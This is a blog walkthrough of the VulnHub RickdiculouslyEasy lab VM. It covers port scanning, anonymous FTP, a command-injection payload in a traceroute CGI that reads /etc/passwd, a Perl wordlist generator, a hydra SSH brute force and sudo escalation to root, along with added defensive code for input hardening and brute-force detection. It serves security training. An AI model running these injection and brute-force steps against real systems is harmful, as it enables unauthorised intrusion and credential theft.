Wednesday, October 9, 2019

VulnHub: RickdiculouslyEasy Walkthrough

Let's first start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-08 21:30 MDT
 
Nmap scan report for 192.168.0.48
Host is up (0.00059s latency).
Not shown: 65330 closed ports
PORT      STATE    SERVICE     VERSION
21/tcp    open     ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.42
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open     ssh?
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open     http        Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open     http        Cockpit web service
|_http-title: Did not follow redirect to https://192.168.0.48:9090/
13337/tcp open     unknown
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open     ssh         OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open     unknown
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
61960/tcp filtered unknown
64071/tcp filtered unknown
MAC Address: 08:00:27:FE:68:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.53 seconds
root@ubuntu:~# 

We did a full nmap scan and found some interesting stuff. The first thing to note is that, according to the nmap output, we have already found two flags. The first one resides on the remote FTP service, so let's enumerate that service and see what we can come up with.

root@ubuntu:~# ftp
ftp> open 192.168.0.48
Connected to 192.168.0.48.
220 (vsFTPd 3.0.3)
Name (192.168.0.48:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.03 secs (1.5057 kB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> exit
221 Goodbye.
root@ubuntu:~# 

We downloaded the flag file; now all we need to do is cat it to see what it contains.

root@ubuntu:~# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
root@ubuntu:~# 

Well, we found our first flag and scored 10 points. The next port (13337) has another flag we need to capture, so let's telnet in to the remote service on port 13337 and see what we get.

root@ubuntu:~# telnet 192.168.0.48 13337
Trying 192.168.0.48...
Connected to 192.168.0.48.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.
root@ubuntu:~# 

We found another flag and gained another 10 points. Let's move on and enumerate the remaining services. The next port we will look at is good old port 80. From the nmap scan we got some information, but now it's time to connect to the website and see what it is all about.

Nothing interesting on the front page and nothing found when I viewed the source. Let's fire up nikto and see if it finds anything of interest.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.0.48
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.48
+ Target Hostname:    192.168.0.48
+ Target Port:        80
+ Start Time:         2019-10-08 22:14:39 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8755 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2019-10-08 22:15:35 (GMT-6) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#

Nikto came back with some interesting results. We see in the output that the directory '/passwords/' exists on the system, so let's open it in the web browser and see what it holds.

Looks like we found another flag and a passwords.html file in the directory. The flag says:

FLAG{Yeah d- just don't do it.} - 10 Points

If we check out passwords.html we are greeted with a message.

My first instinct when I visit these web pages is to view the source and look for comments or code that reveal information. That is exactly what we find here: a password inside the HTML file.

Well, now we have a password, "winter", but I'm not done enumerating the web site. My next task is to run dirb against the web host to try and uncover more hidden directories.

root@ubuntu:~/src/nikto/program# dirb http://192.168.0.48

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Oct  8 22:23:57 2019
URL_BASE: http://192.168.0.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.48/ ----
+ http://192.168.0.48/cgi-bin/ (CODE:403|SIZE:217)                                                                                                                             
+ http://192.168.0.48/index.html (CODE:200|SIZE:326)                                                                                                                           
==> DIRECTORY: http://192.168.0.48/passwords/                                                                                                                                  
+ http://192.168.0.48/robots.txt (CODE:200|SIZE:126)                                                                                                                           
                                                                                                                                                                               
---- Entering directory: http://192.168.0.48/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Oct  8 22:23:58 2019
DOWNLOADED: 4612 - FOUND: 3
root@ubuntu:~/src/nikto/program# 

As I suspected, there were more directories hidden from view. I first tried to visit cgi-bin but got a 403 Forbidden, so I moved on to the robots.txt file.

robots.txt lists two CGI scripts, /cgi-bin/root_shell.cgi and /cgi-bin/tracertool.cgi. Let's visit both and see what they bring.

Well, that led nowhere; let's try the second script.

Here we have an application that performs a traceroute against a host of our choosing. My first thought is a command injection exploit: if the host is passed straight to a shell, we can chain extra commands onto it with ';'.

I tried to cat the /etc/passwd file but was greeted with a picture of a cat. This means you can't use cat to view files and will have to find another way. I tried head and less, which gave me what I was looking for:

127.0.0.1;less /etc/passwd

traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 60 byte packets
 1  localhost (127.0.0.1)  0.034 ms  0.011 ms  0.008 ms
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
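The root cause above is a host parameter that reaches a shell unchanged. The following is an added example, not the VM's tracertool.cgi (whose source the walkthrough never shows): a hypothetical Python traceroute handler with the unsafe command builder beside a hardened one that allow-lists the input and avoids the shell entirely.

```python
import re
import subprocess
from ipaddress import ip_address

# Hypothetical stand-in for tracertool.cgi (constructed; the VM's real
# source is not shown in the walkthrough).

def build_command_vulnerable(target):
    """The bug: user input is pasted into a shell command line, so the
    shell parses '127.0.0.1;less /etc/passwd' as two commands."""
    return "traceroute " + target            # later run with shell=True

def is_valid_target(target):
    """Allow-list check: one IPv4/IPv6 literal or one RFC 1123 hostname.
    Rejects ';', '|', '$(', spaces, a leading '-' and anything else."""
    if not target or len(target) > 253:
        return False
    try:
        ip_address(target)
        return True
    except ValueError:
        pass
    label = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    return re.fullmatch(rf"{label}(?:\.{label})*", target) is not None

def build_command_hardened(target):
    """Validate, then return an argv list: with shell=False the target is
    handed to execve as one argument and is never parsed by /bin/sh."""
    if not is_valid_target(target):
        raise ValueError("target must be a hostname or IP address")
    return ["traceroute", target]

def run_traceroute(target, timeout=60):
    """Run the hardened command; the vulnerable builder above exists only
    to show the contrast and is never executed here."""
    argv = build_command_hardened(target)
    proc = subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout)
    return proc.stdout
```

The cat-picture alias on the VM is a decoy, not a control: the hardened builder rejects the injected string before any command runs, which is the check the original handler lacked.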

Well, we found three users: RickSanchez, Morty and Summer. If you remember, we got a password through view-source, "winter", so I suspect it is the login for one of the users on the system. My next task is to try and log in over SSH with that password as the user Summer.

root@ubuntu:~# ssh Summer@192.168.0.48
ssh_exchange_identification: Connection closed by remote host
root@ubuntu:~# 

It gives this error for every username I tried, so I went back to my nmap scan results and found that SSH was also running on port 22222. So I try this next.

root@ubuntu:~# ssh -p 22222 Summer@192.168.0.48
Summer@192.168.0.48's password: 
Last login: Wed Oct  9 13:18:38 2019 from 192.168.0.42
[Summer@localhost ~]$ 

It worked; now we have a shell on the remote system. If we ls the home directory we find another flag.

[Summer@localhost ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$ 

I started to explore the system and listed the /home directories of RickSanchez and Morty, where some interesting files were waiting. First, in the RickSanchez directory we have no flags but a program named safe. In the Morty directory we have two files, journal.txt.zip and Safe_Password.jpg. The first thing we need to do is copy these files to the Summer home directory so we can work with all of them.

The zip archive has a password, which is contained in Safe_Password.jpg. You can extract the password with the head command like so.

[Summer@localhost Morty]$ head -n 1 Safe_Password.jpg 
���� JFIF  ``���ExifMM        J   R (   �i  Z` `  �    �    P�    8��8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek8BIM  8BIM % � �ُ� �� ���B~� 8 P  "      ��             
[Summer@localhost Morty]$ 

The password is 'Meeseek', so once we unzip journal.txt we find some interesting information.

[Summer@localhost ~]$ more journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or mayb
e it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[Summer@localhost ~]$ 

We got another flag with another password, '131333'. We found a program in the RickSanchez directory called 'safe'; if we copy the program to Summer's home directory and run it we get the following.

[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$ 

[Summer@localhost ~]$ ./safe 131333
decrypt:  FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.� @
[Summer@localhost ~]$ 

We got another flag, some instructions on how to generate passwords and a sudo reference. This is all for the user RickSanchez, so our next task is to create a wordlist with the following rules applied: 1 uppercase character, 1 digit and a word.

I had to google to find his band's name, which is "The Flesh Curtains", so I fired up perl and wrote a small script to generate the passwords.

#!/usr/bin/env perl
use strict;
use warnings;

# Rick's hint: 1 uppercase character, 1 digit, then one word from
# the band name "The Flesh Curtains" -- 26 x 10 x 3 = 780 candidates.
my @words = ('The', 'Flesh', 'Curtains');
for my $alpha ('A'..'Z') {
    for my $num (0..9) {
        foreach my $word (@words) {
            print $alpha . $num . $word . "\n";
        }
    }
}

Save the script's output as a wordlist (morty.txt) and it's time to use hydra to brute force the SSH password for the user RickSanchez.

root@ubuntu:~# hydra -l RickSanchez -P morty.txt ssh://192.168.0.48:22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-08 20:41:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://192.168.0.48:22222/
[STATUS] 264.00 tries/min, 264 tries in 00:01h, 524 to do in 00:02h, 16 active
[22222][ssh] host: 192.168.0.48   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-08 20:44:05
root@ubuntu:~#
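A run like this leaves a loud trail: the later login banner reports "There were 1217 failed login attempts since the last successful login". As an added example (not part of the original post), here is the detection a defender would run over sshd auth logs: count failures per source address in a sliding window and flag a success that follows the burst. The log lines are constructed for the example and are not from the VM.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd syslog sample (not from the VM): a burst of failures
# from one source followed by a success, plus a benign typo from another.
SAMPLE_LOG = """\
Oct  9 13:44:01 localhost sshd[2101]: Failed password for RickSanchez from 192.168.0.42 port 51234 ssh2
Oct  9 13:44:01 localhost sshd[2103]: Failed password for RickSanchez from 192.168.0.42 port 51236 ssh2
Oct  9 13:44:02 localhost sshd[2105]: Failed password for invalid user admin from 192.168.0.42 port 51238 ssh2
Oct  9 13:44:02 localhost sshd[2107]: Failed password for RickSanchez from 192.168.0.42 port 51240 ssh2
Oct  9 13:44:03 localhost sshd[2109]: Failed password for RickSanchez from 192.168.0.42 port 51242 ssh2
Oct  9 13:44:10 localhost sshd[2150]: Accepted password for RickSanchez from 192.168.0.42 port 51300 ssh2
Oct  9 13:50:00 localhost sshd[2200]: Failed password for Summer from 192.168.0.77 port 40000 ssh2
Oct  9 13:50:30 localhost sshd[2201]: Accepted password for Summer from 192.168.0.77 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse_line(line, year=2019):
    """Return (timestamp, result, user, ip) or None for non-auth lines.
    Syslog omits the year, so it is supplied by the caller."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Alert per source IP once `threshold` failures land inside `window_s`
    seconds; record the user if a success arrives while the burst is live."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        q = failures[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()             # drop failures older than the window
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                alerts.setdefault(ip, {"failures": 0, "success_after": None})
                alerts[ip]["failures"] = len(q)
        elif ip in alerts and q:
            alerts[ip]["success_after"] = user   # password was guessed
    return alerts
```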

The password was P7Curtains, so now let's log in and see what we can find.

root@ubuntu:~# ssh -p 22222 RickSanchez@192.168.0.48
RickSanchez@192.168.0.48's password: 
Last failed login: Wed Oct  9 13:44:03 AEDT 2019 from 192.168.0.42 on ssh:notty
There were 1217 failed login attempts since the last successful login.
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ ls -l
total 0
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21  2017 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18  2017 ThisDoesntContainAnyFlags
[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez: 
Matching Defaults entries for RickSanchez on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE
    LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User RickSanchez may run the following commands on localhost:
    (ALL) ALL
[RickSanchez@localhost ~]$ id
uid=1000(RickSanchez) gid=1000(RickSanchez) groups=1000(RickSanchez),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[RickSanchez@localhost ~]$ sudo -s
[root@localhost RickSanchez]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost RickSanchez]# 

We got root! That was a fun challenge.
